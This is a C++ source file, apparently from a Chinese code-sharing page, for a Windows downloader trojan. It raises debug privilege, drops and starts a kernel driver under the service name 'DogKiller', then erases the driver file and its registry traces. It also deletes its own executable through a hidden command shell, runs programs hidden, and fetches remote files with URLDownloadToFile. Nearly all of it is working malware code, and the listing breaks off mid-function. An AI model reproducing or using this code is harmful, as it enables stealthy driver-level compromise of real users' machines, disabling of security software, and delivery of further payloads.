📄 dat.cpp
字号:
// Dat.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include "resource.h"
#include <Windows.h>
#include <WinIoCtl.h>
#include <tchar.h>
#include <shlwapi.h>
#include "stdlib.h"
#include "stdio.h"
// 下载者所需
#include "iphlpapi.h"
#include <urlmon.h>
#include <Tlhelp32.h>
#include <Wininet.h>
#pragma comment(lib,"Wininet.lib")
#pragma comment(lib,"shlwapi.lib")
#pragma comment(linker,"/ALIGN:0x1000")
#define IOCTL_PASS_SNDISK (DWORD)CTL_CODE(FILE_DEVICE_UNKNOWN, 0x06, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INJECT_FILE (DWORD)CTL_CODE(FILE_DEVICE_UNKNOWN, 0x07, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define SERVICE_NAME _T("DogKiller")
// 下载者使用
typedef HRESULT (_stdcall *XXXURLDownloadToFile)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK);
typedef HINTERNET (_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET (_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
typedef BOOL (_stdcall *XXXInternetCloseHandle)(HINTERNET);
// 驱动加载函数
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PVOID Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING;
typedef LSA_UNICODE_STRING UNICODE_STRING, *PUNICODE_STRING;
typedef DWORD (CALLBACK* ZWLOADDRIVER)(PVOID);
ZWLOADDRIVER ZwLoadDriver;
void RaiseToDebugP()
{
HANDLE hToken;
HANDLE hProcess = GetCurrentProcess();
if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES tkp;
if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
{
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0) ;
}
CloseHandle(hToken);
}
}
BOOL ReleaseSysFile( LPCTSTR lpszSysPath )
{
HGLOBAL hGol;
HRSRC hSrc;
BOOL bRet = FALSE;
hSrc = ::FindResource( NULL, MAKEINTRESOURCE(IDR_SYS), _T("BIN"));
if (hSrc == NULL)
return FALSE;
hGol = ::LoadResource( NULL, hSrc);
if ( hGol == NULL)
return FALSE;
PVOID lpData;
DWORD dwSize;
lpData = ::LockResource( hGol);
if (lpData == NULL )
return FALSE;
dwSize = ::SizeofResource( NULL, hSrc);
HANDLE hFile;
hFile = CreateFile( lpszSysPath, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
if ( hFile == INVALID_HANDLE_VALUE )
return FALSE;
bRet = WriteFile( hFile, lpData, dwSize, &dwSize, NULL);
CloseHandle( hFile );
return bRet;
}
SC_HANDLE GetServiceByName(IN LPCTSTR pszServiceName, OUT OPTIONAL SC_HANDLE* pScManager)
{
SC_HANDLE hScManager, hScService;
hScService = NULL;
hScManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if ( pScManager != NULL )
*pScManager = hScManager;
if ( hScManager != NULL )
{
hScService = OpenService(hScManager, pszServiceName, SERVICE_ALL_ACCESS);
if ( pScManager == NULL )
CloseServiceHandle(hScManager);
}
return hScService;
}
SC_HANDLE InstallDriver(IN LPCTSTR pszServiceName, IN LPCTSTR pszDriverFile)
{
SC_HANDLE hScManager, hScService;
hScManager = NULL;
hScService = GetServiceByName(pszServiceName, &hScManager);
if (
hScService == NULL &&
hScManager != NULL &&
GetFileAttributes(pszDriverFile) != -1/*INVALID_FILE_ATTRIBUTES*/
)
{
hScService = CreateService(hScManager, pszServiceName, pszServiceName, SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, pszDriverFile, NULL,
NULL, NULL, NULL, NULL
);
}
if ( hScManager != NULL )
CloseServiceHandle(hScManager);
return hScService;
}
//
// 驱动加载
//
BOOL MC_AnsiToUnicode(const char *pAnsi,wchar_t *pUnicode,size_t buflen)
{
size_t len=strlen(pAnsi);
if((buflen<(len+1)*2)||(pUnicode==NULL))
{
return FALSE;
}
memset(pUnicode,0,(len+1)*2);
for(UINT i=0;i<len;i++)
{
memcpy(pUnicode+i,pAnsi+i,1);
}
memcpy(pUnicode+len,"\0",1);
return TRUE;
}
BOOL LoadDriver(char * szDrvName, char * szDrvPath)
{
HMODULE hNtdll = NULL;
hNtdll = LoadLibrary( "ntdll.dll" );
if ( !hNtdll )
{
return FALSE;
}
ZwLoadDriver = (ZWLOADDRIVER)
GetProcAddress( hNtdll, "ZwLoadDriver");
LSA_UNICODE_STRING buf2;
char szSubKey[200], szDrvFullPath[256],szName[256]={0};
int iBuffLen;
HKEY hkResult;
char Data[4];
DWORD dwOK;
iBuffLen = sprintf(szSubKey,"System\\CurrentControlSet\\Services\\%s",szDrvName);
szSubKey[iBuffLen]=0;
strcpy(szName,"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services");
dwOK = RegCreateKey(HKEY_LOCAL_MACHINE,szSubKey,&hkResult);
if(dwOK!=ERROR_SUCCESS)
return FALSE;
Data[0]=1;
Data[1]=0;
Data[2]=0;
Data[3]=0;
dwOK=RegSetValueEx(hkResult,"Type",0,4,(const unsigned char *)Data,4);
dwOK=RegSetValueEx(hkResult,"ErrorControl",0,4,(const unsigned char *)Data,4);
char StartData[4];
StartData[0]=3;
StartData[1]=0;
StartData[2]=0;
StartData[3]=0;
dwOK=RegSetValueEx(hkResult,"Start",0,4,(const unsigned char *)StartData,4);
RegCloseKey(hkResult);
iBuffLen = sprintf(szDrvFullPath,"\\??\\%s",szDrvPath);
szDrvFullPath[iBuffLen]=0;
wchar_t wPath[MAX_PATH+1]={0};
MC_AnsiToUnicode(szDrvFullPath,wPath,MAX_PATH*2);
//AddStringToReg(szName,szDrvName,"ImagePath",wPath,2*(wcslen(wPath)+1),REG_SZ);
//AddStringToReg(szSubKey,"","ImagePath",wPath,2*(wcslen(wPath)+1),REG_SZ);
iBuffLen = sprintf(szSubKey,"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\%s",szDrvName);
wchar_t wLoad[MAX_PATH+1]={0};
szSubKey[iBuffLen]=0;
MC_AnsiToUnicode(szSubKey,wLoad,MAX_PATH*2);
buf2.Buffer = (PVOID)wLoad;
buf2.Length = iBuffLen*2;
ZwLoadDriver(&buf2);
return TRUE;
}
void xxxx(LPCTSTR szSysPath)
{
BOOL bResult;
ReleaseSysFile(szSysPath);
/* CHAR ac_driverLabel[] = "PCIbusDevice00";
DWORD dwResult ;
TCHAR pSys[MAX_PATH+1]={0};
dwResult = ExpandEnvironmentStrings(
TEXT("%SystemRoot%\\System32\\drivers"),
pSys,
MAX_PATH);
if(dwResult==0)
{
return;
}
_tcscat(pSys,TEXT("\\disks.sys"));
LoadDriver(SERVICE_NAME,(char *)szSysPath);*/
SC_HANDLE hScHandle = InstallDriver( SERVICE_NAME, szSysPath );
if ( hScHandle != NULL )
{
SERVICE_STATUS Status;
if (
!QueryServiceStatus(hScHandle, &Status) ||
Status.dwCurrentState != SERVICE_RUNNING
)
{
bResult = StartService(hScHandle, 0, NULL);
}
else
{
bResult = TRUE;
}
CloseServiceHandle(hScHandle);
}
DeleteFile( szSysPath );
SHDeleteKey( HKEY_LOCAL_MACHINE, _T("SYSTEM\\CurrentControlSet\\Services\\") SERVICE_NAME );
};
//
// 映射文件,返回映射后的地址,并保存文件的大小
//
LPVOID MapFile(LPCTSTR lpFilePath, LPDWORD lpdwFileSize, BOOL bReadOnly)
{
DWORD dwAccess[3];
if ( bReadOnly )
{
dwAccess[0] = GENERIC_READ;
dwAccess[1] = PAGE_READONLY;
dwAccess[2] = FILE_MAP_READ;
}
else
{
dwAccess[0] = (GENERIC_WRITE | GENERIC_READ);
dwAccess[1] = PAGE_READWRITE;
dwAccess[2] = (FILE_MAP_READ | FILE_MAP_WRITE);
}
HANDLE hFile = CreateFile(lpFilePath, dwAccess[0], FILE_SHARE_READ,
NULL, OPEN_EXISTING, 0, NULL);
if ( hFile != INVALID_HANDLE_VALUE )
{
if ( lpdwFileSize != NULL )
{
*lpdwFileSize = GetFileSize(hFile, NULL);
}
HANDLE hFileMap = CreateFileMapping(hFile, NULL, dwAccess[1], 0, 0, NULL);
CloseHandle(hFile);
if ( hFileMap != NULL )
{
LPVOID lpFileData = MapViewOfFile(hFileMap, dwAccess[2], 0, 0, 0);
CloseHandle(hFileMap);
return lpFileData;
}
}
return NULL;
}
void UnmapFile(LPVOID lpFileData)
{
if ( lpFileData != NULL )
{
UnmapViewOfFile(lpFileData);
}
}
//
// 获取文件尾在内存中的地址
//
LPVOID GetOverlayOffset(PVOID lpBuffer, DWORD dwSize, LPDWORD poutSize)
{
PIMAGE_DOS_HEADER DosHeader;
PIMAGE_NT_HEADERS NtHeader;
PIMAGE_SECTION_HEADER SectHeader;
DosHeader = (PIMAGE_DOS_HEADER)lpBuffer;
if ( DosHeader->e_magic != IMAGE_DOS_SIGNATURE )
return NULL;
NtHeader = (PIMAGE_NT_HEADERS)( DosHeader->e_lfanew + (DWORD)DosHeader );
if ( NtHeader->Signature != IMAGE_NT_SIGNATURE )
return NULL;
DWORD overlay = NULL;
// 获取第一个表的位置
SectHeader = IMAGE_FIRST_SECTION(NtHeader);
SectHeader += (NtHeader->FileHeader.NumberOfSections-1);
// 获取到文件中第一个块的位置,是个地址
overlay = SectHeader->PointerToRawData + SectHeader->SizeOfRawData + (DWORD)lpBuffer;
if ( poutSize != NULL )
{
// 获取文件数据的大小,去掉了pe头部的信息
*poutSize = dwSize - (overlay -(DWORD)lpBuffer);
}
return (PVOID)overlay;
}
//
// PVOID GetOverlayInfo( LPCTSTR lpFileName, LPDWORD dwSize, LPDWORD dwUrlOffset )
// {
// // 把overlay读入内存
// DWORD dwFileSize;
// LPVOID lpBuffer;
// PVOID pVersion = NULL;
// PVOID pUrlAddress = NULL;
// DWORD dwVersionSize;
//
// lpBuffer = MapFile( lpFileName, &dwFileSize, TRUE);
// if ( lpBuffer == NULL )
// return NULL;
//
// /* struct {
// DWORD dwVirusSize;
// BYTE VirusData[1];
// };
// */
// pVersion = GetOverlayOffset( lpBuffer, dwFileSize, &dwVersionSize);
// if ( pVersion != NULL )
// {
// OutputDebugString("xxx");
//
// DWORD urlSize;
// pUrlAddress = GetOverlayOffset( pVersion, dwVersionSize, &urlSize);
// if ( pUrlAddress != NULL)
// {
// OutputDebugString("xxx2");
//
// if ( dwSize != NULL )
// *dwSize = urlSize;
//
// if ( dwUrlOffset != NULL )
// *dwUrlOffset = (dwVersionSize-urlSize);
// }
// else
// pVersion = NULL;
// }
//
// UnmapFile(lpBuffer);
//
// return pUrlAddress;
// }
int WINAPI K32DeleteSelfFile()
{
TCHAR tcsExename[MAX_PATH];
TCHAR tcsParam[MAX_PATH * 2];
TCHAR tcsCmd[MAX_PATH];
HANDLE hProcess = NULL;
// get exe filename and command shell program
GetModuleFileName(NULL, tcsExename, MAX_PATH);
GetEnvironmentVariable(_T("COMSPEC"), tcsCmd, MAX_PATH);
// get short filename for command shell program
GetShortPathName(tcsExename, tcsExename, MAX_PATH);
// create a command process, set its priority, then start it.
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
ZeroMemory( &pi, sizeof(pi) );
_stprintf(tcsParam, _T("%s /c del %s"), tcsCmd, tcsExename);
if(!CreateProcess(NULL,
tcsParam,
NULL,
NULL,
FALSE,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi))
{
return GetLastError();
}
// heigthen priority of the current process
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
// set file attribute to normal
SetFileAttributes(tcsExename, FILE_ATTRIBUTE_NORMAL);
// depress priority of command process, then start it
SetPriorityClass(pi.hProcess, IDLE_PRIORITY_CLASS);
ResumeThread(pi.hThread);
return 0;
}
//
// 运行程序
//
BOOL RunProcess(LPCTSTR szFileName, BOOL bShow)
{
STARTUPINFO si = {0};
PROCESS_INFORMATION pi = {0};
BOOL bRet = FALSE;
si.cb = sizeof(si);
if ( bShow )
{
// si.wShowWindow = SW_SHOW;
// si.dwFlags |= STARTF_USESHOWWINDOW;
WinExec( szFileName, SW_SHOW);
}
else
WinExec( szFileName, SW_HIDE);
return bRet;
}
void DownloadFile(LPCTSTR lpszUrl, int iProcessNameNumber)
{
BOOL bIsIni = FALSE;
LPTSTR lpPostFix = strrchr(lpszUrl, '.');
if ( lpPostFix == NULL )
return;
lpPostFix++;
XXXURLDownloadToFile kkkkkk;
HRESULT hRes ;
TCHAR szTempDir[MAX_PATH];
TCHAR szTempExe[MAX_PATH];
kkkkkk = (XXXURLDownloadToFile)GetProcAddress( LoadLibrary("urlmon.dll"), "URLDownloadToFileA");
if ( kkkkkk == NULL )
return;
if ( stricmp(lpPostFix, "ini") == 0 || stricmp(lpPostFix, "txt") == 0 )
{
bIsIni = TRUE;
}
if (bIsIni)
{
// 是配置文件,则下载保存为down.txt
GetSystemDirectory(szTempDir, MAX_PATH);
strcat(szTempDir, "\\down.txt");
strcpy(szTempExe, szTempDir);
// 循环300次
for ( DWORD index = 0; index < 10; index++)
{
hRes = kkkkkk( NULL, lpszUrl, szTempExe, 0, NULL);
if ( hRes == S_OK )
{
break;
}
Sleep(1000);
}
if ( index == 10 )
{
return;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -